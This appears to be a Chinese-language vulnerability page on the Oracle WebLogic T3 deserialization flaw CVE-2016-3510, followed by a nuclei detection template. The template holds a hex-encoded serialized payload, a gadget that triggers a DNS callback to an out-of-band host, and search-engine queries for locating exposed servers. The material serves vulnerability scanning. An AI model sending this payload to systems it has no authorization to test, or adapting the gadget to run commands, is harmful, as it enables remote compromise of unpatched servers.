Oracle WebLogic Server Java Object Deserialization - Remote Code Execution

漏洞信息

漏洞名称： Oracle WebLogic Server Java Object Deserialization - Remote Code Execution

漏洞编号：

• CVE： CVE-2016-3510

漏洞类型： 反序列化

漏洞等级： 严重

漏洞描述： Oracle WebLogic Server是Oracle公司开发的一个企业级Java EE应用服务器，广泛应用于大型企业的关键业务系统中。该产品支持分布式计算和Web服务，是企业级应用部署的常见选择。此次曝光的漏洞涉及WebLogic Server的核心组件，通过特定的向量，攻击者可以远程执行代码，严重影响系统的机密性、完整性和可用性。

漏洞的技术根源在于WebLogic Server的Java对象反序列化机制存在缺陷。攻击者可以通过构造恶意的序列化对象，利用T3协议发送给WebLogic Server，触发反序列化过程，从而在服务器上执行任意代码。这一漏洞不需要用户交互，且攻击复杂度低，使得其危害性极高。

该漏洞的影响极为严重，攻击者可以利用此漏洞完全控制受影响的WebLogic Server，执行任意命令，窃取敏感数据，甚至部署后门程序长期控制受害系统。由于WebLogic Server通常部署在企业内网的核心位置，一旦被攻破，可能导致整个企业网络的安全防线崩溃。此外，该漏洞的利用方式已经被公开，增加了被大规模利用的风险。企业应立即应用Oracle提供的安全补丁，以防范潜在的攻击。

产品厂商： Oracle

产品名称： Oracle WebLogic Server

影响版本： 10.3.6.0, 12.1.3.0, 12.2.1.0

搜索语法： product:”oracle weblogic”, http.title:”oracle peoplesoft sign-in”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/64a64b0937e369fef2cb769b4e48757616ecce15/network%2Fcves%2F2016%2FCVE-2016-3510.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2016-3510

info:
  name: Oracle WebLogic Server Java Object Deserialization -  Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch, NaN@korelogic
  severity: critical
  description: |
    Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to WLS Core Components, a different vulnerability than CVE-2016-3586.
  remediation: |
    Install the relevant patch as per the advisory provided in the Oracle Critical Patch Update for July 2016.
  reference:
    - https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/weblogic.py
    - http://packetstormsecurity.com/files/152324/Oracle-Weblogic-Server-Deserialization-MarshalledObject-Remote-Code-Execution.html
    - http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
    - http://www.securitytracker.com/id/1036373
    - https://www.tenable.com/security/research/tra-2016-21
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-3510
    cwe-id: CWE-119
    epss-score: 0.93179
    epss-percentile: 0.99789
    cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: oracle
    product: weblogic_server
    shodan-query:
      - product:"oracle weblogic"
      - http.title:"oracle peoplesoft sign-in"
    fofa-query: title="oracle peoplesoft sign-in"
    google-query: intitle:"oracle peoplesoft sign-in"
  tags: packetstorm,cve,cve2016,oracle,weblogic,t3,rce,oast,deserialization,network,tcp
variables:
  start: "016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e64383f42a6d92c9e9af0f9472027973720078720178720278700000000c00000002000000000000000000000001007070707070700000000c00000002000000000000000000000001007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000"
  end: "fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200074900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870774621000000000000000000093132372e302e312e31000b75732d6c2d627265656e73a53caff10000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff0078fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870771d018140128134bf427600093132372e302e312e31a53caff1000000000078"

tcp:
  - inputs:
      - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"
        read: 1024

      - data: "{{hex_decode(concat('00000460',start,generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex'),end))}}"

    host:
      - "{{Hostname}}"
      - "{{Host}}:{{Port}}"
    read-size: 4
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4b0a00483046022100ea029832c0ab04118402ee3841955fe976f1a6733c03db8927824a3743216230022100da060ca8b653feeaf33f063732129911e95190383cbf70f8e7c43c1288f8f837:922c64590222798bb761d5b6d8e72950